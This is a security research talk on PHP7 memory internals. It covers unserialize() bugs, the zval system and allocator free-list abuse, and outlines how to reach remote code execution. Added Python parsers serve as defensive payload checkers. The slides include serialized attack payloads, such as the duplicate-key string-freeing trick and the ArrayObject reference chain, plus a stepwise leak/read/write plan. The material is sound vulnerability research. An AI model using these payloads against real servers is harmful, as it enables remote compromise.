![Page 1: TEACHING THE NEW DOG OLD TRICKS - Power Of Community · 2018-01-08 · PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD](https://reader030.vdocuments.us/reader030/viewer/2022041015/5ec6df102dfa263589408138/html5/thumbnails/1.jpg)
©2016 Check Point Software Technologies Ltd.
PHP7 Memory Internals for Security Researchers
Yannay Livneh | Security Researcher
TEACHING THE NEW DOG OLD TRICKS
About Me
• Yannay Livneh
• Security Researcher @ CheckPoint
• Play w/
  – Networks
  – Embedded
  – Linux
  – Memory Corruptions
  – and stuff
AGENDA
• Introduction
• PHP Unserialize
• ZVAL System
• Unserialize + ZVAL => Bugs
• Allocator
• Bugs + Allocator => Exploit
• Q.E.D.
INTRO (THIS WORLD WE LIVE IN)
PHP – it's interesting
• Widely used
• Servers rule the world
• PHP-7 - future
PHP Security
• Vulns vulns vulns
• SQL Injection
• XSS
• Memory corruption?
  – Native functions
  – User input
• UNSERIALIZE
Unserialize History of Insecurity
• More CVEs than I can count
• Object Injection (PoP)
• Memory Corruptions
• Generic Exploitation (@i0n1c)
Examples in the wild
PHP-7
• Released in December 2015
• New values (zval) system
• New Memory Allocation
• => previous exploitation irrelevant
Unserialize Nowadays – PHP-7
• Some CVEs
• Object Injection (PoP)
• Memory Corruptions
• No Remote Exploits
UNSERIALIZE (WHAT WE EXPLOIT)
Unserialize
Serialize/Unserialize
Serialization
$val = array(
    NULL, 1337, 'apple', array(
        'a' => 1, new stdClass(), 7331
    ));
serialize($val);

The serialized string, built up one element at a time:
a:4:{ }
a:4:{i:0;N; }
a:4:{i:0;N;i:1;i:1337; }
a:4:{i:0;N;i:1;i:1337;i:2;s:5:"apple"; }
a:4:{i:0;N;i:1;i:1337;i:2;s:5:"apple";i:3;a:3:{ }}
a:4:{i:0;N;i:1;i:1337;i:2;s:5:"apple";i:3;a:3:{s:1:"a";i:1; }}
a:4:{i:0;N;i:1;i:1337;i:2;s:5:"apple";i:3;a:3:{s:1:"a";i:1;i:0;O:8:"stdClass":0:{} }}
a:4:{i:0;N;i:1;i:1337;i:2;s:5:"apple";i:3;a:3:{s:1:"a";i:1;i:0;O:8:"stdClass":0:{}i:1;i:7331;}}
Unserialization
unserialize('a:4:{i:0;N;i:1;i:1337;i:2;s:5:"apple";i:3;a:3:{s:1:"a";i:1;i:0;O:8:"stdClass":0:{}i:1;R:3;}}');

var_hash fills one slot per value, in parse order (array keys get no slot):
slot 1: array (outer)
slot 2: NULL          ← [0]
slot 3: 1337          ← [1]
slot 4: 'apple'       ← [2]
slot 5: array (inner) ← [3]
slot 6: 1             ← inner ['a']
slot 7: stdClass()    ← inner [0]
inner [1]: R:3 → a reference back to slot 3, the 1337 already unserialized (no new slot)
Unserialize Take Away
• Complicated format
• User control allocation
• Global references
• Re-use values
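As an added example (not the slides' or PHP's own code; PHP's real parser is ext/standard/var_unserializer.re), here is a small reader for the serialize() subset used above (N, i, s, a, O and R/r). It keeps the var_hash slot table the slides number 1..7, resolves R:n against it, bounds the user-controlled string length, and records which classes and back-references a payload carries, which is the check a defender wants before untrusted input reaches unserialize(). All class and function names are this example's own.

```python
"""Added example, not PHP's own code (its parser is ext/standard/var_unserializer.re):
a reader for the serialize() subset on the slides (N, i, s, a, O, R/r) that keeps the
var_hash slot table the slides number 1..7 and resolves R:n against it. Names are ours."""
from collections import namedtuple

PHPObject = namedtuple("PHPObject", "cls props")   # props: dict filled while parsing
PHPRef = namedtuple("PHPRef", "slot target")       # R:n back-reference and its resolved value


class Unserializer:
    def __init__(self, data):
        self.s, self.i = data, 0
        self.var_hash = []   # slot n of the slides is var_hash[n - 1]
        self.classes = []    # class name of every O: entry
        self.refs = []       # slot targeted by every R:/r: entry

    def parse(self):
        val = self._value(push=True)
        if self.i != len(self.s):
            raise ValueError(f"trailing data at offset {self.i}")
        return val

    def _expect(self, tok):
        if not self.s.startswith(tok, self.i):
            raise ValueError(f"expected {tok!r} at offset {self.i}")
        self.i += len(tok)

    def _until(self, ch):
        end = self.s.index(ch, self.i)   # ValueError if the delimiter is missing
        tok, self.i = self.s[self.i:end], end + 1
        return tok

    def _string(self):
        # The length prefix is user-controlled ("user control allocation"): bound it by the input.
        n = int(self._until(':'))
        self._expect('"')
        if n < 0 or self.i + n > len(self.s):
            raise ValueError(f"string length {n} exceeds input")
        val, self.i = self.s[self.i:self.i + n], self.i + n
        self._expect('"')
        return val

    def _value(self, push):
        if self.i >= len(self.s):
            raise ValueError("unexpected end of input")
        tag = self.s[self.i]
        self.i += 1
        # Every value except an R: back-reference takes the next var_hash slot;
        # array and property keys are parsed with push=False and get none.
        slot = None
        if push and tag != 'R':
            slot = len(self.var_hash)
            self.var_hash.append(None)
        if tag != 'N':
            self._expect(':')
        if tag == 'N':
            self._expect(';')
            val = None
        elif tag == 'i':
            val = int(self._until(';'))
        elif tag == 's':
            val = self._string()
            self._expect(';')
        elif tag in ('a', 'O'):
            if tag == 'O':
                self.classes.append(self._string())
                self._expect(':')
            count = int(self._until(':'))
            self._expect('{')
            val = PHPObject(self.classes[-1], {}) if tag == 'O' else {}
            if slot is not None:
                self.var_hash[slot] = val   # containers are visible to nested R:
            members = val.props if tag == 'O' else val
            for _ in range(count):
                key = self._value(push=False)
                members[key] = self._value(push=True)
            self._expect('}')
        elif tag in ('R', 'r'):
            target = int(self._until(';'))
            if not 1 <= target <= len(self.var_hash):
                raise ValueError(f"reference to unknown slot {target}")
            self.refs.append(target)
            val = PHPRef(target, self.var_hash[target - 1])
        else:
            raise ValueError(f"unknown tag {tag!r} at offset {self.i - 1}")
        if slot is not None:
            self.var_hash[slot] = val
        return val


def inspect_payload(payload):
    """Defender-side pre-check: which classes and back-references does a payload
    carry? Refuse unexpected classes, as unserialize()'s allowed_classes does."""
    u = Unserializer(payload)
    u.parse()
    return {"slots": len(u.var_hash), "classes": u.classes, "references": u.refs}


# The deck's own payload; R:3 resolves to slot 3, the 1337 parsed earlier.
DECK_PAYLOAD = ('a:4:{i:0;N;i:1;i:1337;i:2;s:5:"apple";i:3;a:3:{s:1:"a";i:1;'
                'i:0;O:8:"stdClass":0:{}i:1;R:3;}}')
```

Running `inspect_payload(DECK_PAYLOAD)` reports 7 slots, the class list `['stdClass']` and a back-reference to slot 3, matching the var_hash walk-through above. The slot bookkeeping follows the slides: every value except an `R:` entry gets a slot before its children are parsed, so a nested `R:` can refer to the container it sits in; keys never get one.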
ZVALS (HOW VALUES ARE STORED)
Zvals
• Holds PHP variables
  • $x = 1;
• Features:
  – Garbage collection
  – References: $y = &$x;
Old (PHP-5) Zvals
• Zval is a pointer
• Zval creation => allocate struct
• GC – refcount + cycle detection
• Reference – point same struct
New Zvals motivation
• Less derefs
• Less allocations
• Designed for embedding
  – In structs
  – In arrays
  – On the stack
New Zvals
• Only value & type
• zend_value: union
  – primitive value
  – pointer to struct
Example: int
$x = 1337;
zval struct:
  value 1337
  type  IS_LONG
New Zvals - refcount
• Refcount depends on type
  – Not refcounted: primitives
  – Refcounted: complex types
Example: string
$x = "apple";
zval struct:
  value → _zend_string
  type  IS_STRING
_zend_string:
  refcount 0 when allocated, 1 once $x holds it
  hash     0
  len      5
  val[]    'a' 'p' 'p' 'l' 'e' '\0'
New Zvals – references
• New type: reference

$x = 1337;
zval struct ($x): value 1337, type IS_LONG

$x = 1337; $y = &$x;
• a _zend_reference is allocated (refcount 0) and the long moves into it:
  _zend_reference: refcount 0, val = zval struct { value 1337, type IS_LONG }
• $x is rewritten to point at it:
  zval struct ($x): value → _zend_reference, type IS_REFERENCE; refcount 1
• $y points at the same _zend_reference:
  zval struct ($y): value → _zend_reference, type IS_REFERENCE; refcount 2
ZVALS Take Away
• Designed for embedding
• Less derefs
• Less heap use
• References - complicated
BUGS (AKA vulns)
Code Smell
• Global pointer to stack
• SplObjectStorage::unserialize
• Not a bug
Use Uninitialized Value
• SplObjectStorage::unserialize
• Which leads to
  – rval = &inf
• Less common with pointers
CVE-2016-7480
Type Confusion
• Making a Reference… • Change type • SplObjectStorage::unserialize
.
Type Confusion
php_var_unserialize(&entry)
if (Z_TYPE(entry) != IS_OBJECT) { /* ERROR!!! */ }
php_var_unserialize(&inf)

What the slides show, step by step:
• after php_var_unserialize(&entry): zval struct (entry) { value → _zend_object …, type IS_OBJECT }; the type check passes
• during php_var_unserialize(&inf): a _zend_reference { refcount 0, val = zval struct { value → _zend_object, type IS_OBJECT } } is created around the object
• entry is rewritten in place: zval struct (entry) { value → _zend_reference, type IS_REFERENCE }; refcount 1
• inf lands on the same _zend_reference: zval struct (inf) { value → _zend_reference, type IS_REFERENCE }; refcount 2
• entry was checked as IS_OBJECT but is now IS_REFERENCE
BUG #73258
Use After Free
• Pointing to dynamic struct
• var_unserializer.c:process_nested_data
• data points to ht
• data stored in var_hash
• when ht resized
• ht reallocated
Use After Free
var_hash entry: zval struct { value → _zend_object, type IS_OBJECT }
_zend_object: … properties → ht
ht before the resize: two zval structs { value 0, type IS_LONG } { value 1, type IS_LONG }
ht after the resize: a new allocation of three zval structs { value 0, IS_LONG } { value 1, IS_LONG } { value 2, IS_LONG }; the old ht is freed while var_hash still points into it
Use After Free
• Not very common
• Unserialize ensure size ht
• Yet…
• __wakeup define property
• DateInterval add properties
CVE-2016-7479
Bugs Take Away
• More unserialize vulns
• Different vulns
• Use freed values
ALLOC (WHERE MEMORY COMES FROM)
Old (PHP-5) Allocator
• Heap
• Meta data per slot
  – Size
  – Flags
• Free List
PHP-7 Allocator
• Complete Rewrite
• Bins
• Free Lists
Allocator
• Allocate CHUNK from OS (2MB)
• Divide to PAGES (4096B)
• First page – descriptor
  – List of allocated and free pages
  – Pointers to BINS
• BIN – free list
  – By size
  – Multiple pages
New CHUNK
CHUNK: chunk descriptor (free_slots, page_info) in the first page, data pages after it
New BIN
CHUNK: chunk descriptor (free_slots: 16 …, page_info); one free-list head per bin size, page_info marks which pages belong to the bin
emalloc(size)
    bin_num = size2bin(size)
    if NULL == heap->free_slots[bin_num]
        init_bin(heap, bin_num)
    return pop(heap->free_slots[bin_num])
emalloc
CHUNK: chunk descriptor (free_slots: 16 … 32, page_info); emalloc pops the head of the matching bin's free list
efree(ptr)
    chunk = ptr & MASK_2M
    page_num = (ptr & ~MASK_2M) >> OFFSET_4K
    bin = page2bin(chunk, page_num)
    push(chunk->heap->free_slots[bin], ptr)
efree
CHUNK: chunk descriptor (free_slots: 16 … 32, page_info); efree pushes the slot back onto its bin's free list
Allocator Take Away
• Allocation predictability
• Impossible free() arbitrary memory
  – Bit operations
  – Lookup in page descriptor
• Abuse free list pointer – arbitrary write
  – Will explain in few slides
EXPLOIT (GETTING THINGS DONE)
Exploitation Stages
• Leak
• Read
• Write
• Exec
Leak
• Abuse the Allocator ☺
• Roughly based on @i0n1c's method
• Serialize freed object
• Allocator override
• Read more freed data
Leak Theory
• Allocator free list
  • first sizeof(void*) point to next slot
• Read freed object
  • Read via pointer to next slot
  – i.e. read prev freed object
DateInterval (slides 77–78: figures only)

Heap Address Leak
• Allocate a DateInterval
• Allocate the object to leak – a string
• Free both objects
• The allocator points the DateInterval at the string
• The allocator overwrites the string with pointers
• Serialize

DateInterval (slides 80–83: figures only)

Read Memory
• If you control a zval – forge a DateInterval
• If you don't:
– Free a DatePeriod object
– Set _php_date_period.start->tz_abbr to the memory to read
– Serialization passes that pointer to strcpy
– More info in the paper

Write Memory
• free() strings
• The strings contain pointers
• Abuse the free list – inc/dec => point to a free slot
• Allocate memory
• Allocation of an arbitrary pointer

Freeing Strings
• Unserialize a hash table (array)
• Use the same key twice – e.g. a:2:{s:4:"AAAA";i:0;s:4:"AAAA";i:0;}
• The second time, the key is freed

Abuse Possible
• Slot "next" – the first field
• Refcount is the first field – e.g. _zend_object
• UAF – add ref / dec ref
• Actually inc/dec next

[Restricted] ONLY for designated groups and individuals
Abusing Free List… (slides 88–96, animated)
s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:2:{s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";i:0;s:31:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";a:0:{}}i:3;C:11:"ArrayObject":18:{x:i:0;r:11;;m:r:2;}i:4;r:11;i:5;r:11;i:6;r:11;i:7;r:11;i:8;r:11;i:9;r:11;i:10;r:11;i:11;…
[Memory dump figure of the bin slots 0xb5c531e0 through 0xb5c532d0, annotated heap->free_list[bin_num]; across the nine frames the first word of slot 0xb5c531e0 steps from 0xb5c53270 to 0xb5c53280 in increments of 2.]

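A defender-side check for the two payload shapes shown above (the duplicate-key array from the Freeing Strings slide and the ArrayObject / r:N chain from the Abusing Free List slides), added here as an example and not part of the talk: a small parser for PHP's serialize() format that reports duplicate keys, back-references and object payloads without ever instantiating anything. The class and function names are my own, and the two sample payloads are constructed (the second is a shortened, self-consistent cut of the slide's payload).

```python
# Added example, not from the talk: walk PHP serialize() output and report the constructs the talk relies on.

class SerializedInspector:
    def __init__(self, data):
        self.data, self.pos, self.findings = data, 0, []

    def _expect(self, tok):
        if not self.data.startswith(tok, self.pos):
            raise ValueError(f"expected {tok!r} at offset {self.pos}")
        self.pos += len(tok)

    def _until(self, delim):
        end = self.data.index(delim, self.pos)          # ValueError if missing
        chunk, self.pos = self.data[self.pos:end], end + len(delim)
        return chunk

    def _pairs(self, count, where):
        out = {}                    # a repeated key is the "free a string" trick
        for _ in range(count):
            key = self.value()
            if key in out:
                self.findings.append(("duplicate_key", f"{where} key {key!r}"))
            out[key] = self.value()
        self._expect(b"}")
        return out

    def value(self):
        tag, self.pos = self.data[self.pos:self.pos + 1], self.pos + 1
        if tag == b"N":
            return self._expect(b";")                   # null; yields None
        self._expect(b":")
        if tag in (b"i", b"b", b"d"):                   # scalars kept as raw bytes
            return self._until(b";")
        if tag in (b"r", b"R"):                         # back-reference: refcount bump
            target = self._until(b";").decode()
            self.findings.append(("reference", f"{tag.decode()}:{target}"))
            return ("ref", target)
        if tag == b"s":
            n = int(self._until(b":"))
            self._expect(b'"')
            raw, self.pos = self.data[self.pos:self.pos + n], self.pos + n
            self._expect(b'";')
            return raw
        if tag in (b"a", b"O", b"C"):
            where = "array"
            if tag != b"a":                             # object: report, never build
                self._until(b":")                       # class-name length, unused
                where = self._until(b":").strip(b'"').decode()
                self.findings.append(("object", f"{tag.decode()}:{where}"))
            n = int(self._until(b":"))
            self._expect(b"{")
            if tag == b"C":                             # opaque blob: skip it whole
                self.pos, n = self.pos + n, 0
            return self._pairs(n, where)
        raise ValueError(f"unknown tag {tag!r} at offset {self.pos - 2}")


def scan_payload(payload):
    """Findings for one payload; malformed input raises. Trailing bytes are ignored, as unserialize() does."""
    insp = SerializedInspector(payload)
    insp.value()
    return insp.findings


# Constructed samples: the talk's duplicate-key array, and a shortened cut of its ArrayObject / r:N payload.
DUP_KEY = b'a:2:{s:4:"AAAA";i:0;s:4:"AAAA";i:0;}'
REF_PAYLOAD = b'a:3:{i:0;C:11:"ArrayObject":18:{x:i:0;r:11;;m:r:2;}i:1;r:2;i:2;r:2;}'
```

Run it on the raw request body before any call to unserialize(); any finding is reason to reject the input, and the better fix is to move the endpoint to JSON.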
Code Execution
• Forge a zval – override a callback
• If not – use the write primitive

Exploit Take Away
• Use the allocator
• Re-usable primitives
• Primitives => remote exploit

Conclusions
• High level > low level
• New design – new vulns
• Exploiter-friendly allocator
• unserialize => practically unauthorized RCE

More Info
• http://blog.checkpoint.com
• http://bugs.php.net
• https://nikic.github.io
• Twitter: @yannayli

QUESTIONS?